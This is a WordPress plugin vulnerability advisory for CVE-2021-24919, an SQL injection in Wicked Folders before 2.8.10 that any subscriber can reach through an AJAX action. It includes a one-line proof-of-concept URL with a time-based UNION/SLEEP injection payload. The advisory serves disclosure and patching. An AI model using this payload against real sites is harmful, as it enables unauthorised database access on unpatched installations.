WordPress Plugin Vulnerabilities

Wicked Folders < 2.8.10 - Subscriber+ SQL Injection

Description

The plugin does not sanitise and escape the folder_id parameter before using it in a SQL statement in the wicked_folders_save_sort_order AJAX action, available to any authenticated user. leading to an SQL injection

Proof of Concept

As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=wicked_folders_save_sort_order&folder_id=-1%20UNION%20(SELECT%2042,42,42%20FROM%20(SELECT(SLEEP(5)))b)%20--

Affects Plugins

Plugin icon
wicked-folders
Fixed in 2.8.10

References

CVE
CVE-2021-24919
URL
https://plugins.trac.wordpress.org/changeset/2651221

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
f472ec7d-765c-4266-ab9c-e2d06703ebb4

Timeline

Publicly Published
2022-01-03 (about 2 years ago)
Added
2022-01-03 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2024-03-19
Title
create by mediavine < 1.9.5 - Unauthenticated SQLi
Published
2023-06-22
Title
Colibri Page Builder < 1.0.229 - Admin+ SQL Injection
Published
2021-05-16
Title
Bello < 1.6.0 - Unauthenticated Blind SQL Injection
Published
2022-02-28
Title
Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection
Published
2022-02-01
Title
Conversios.io < 4.6.2 - Subscriber+ SQL Injection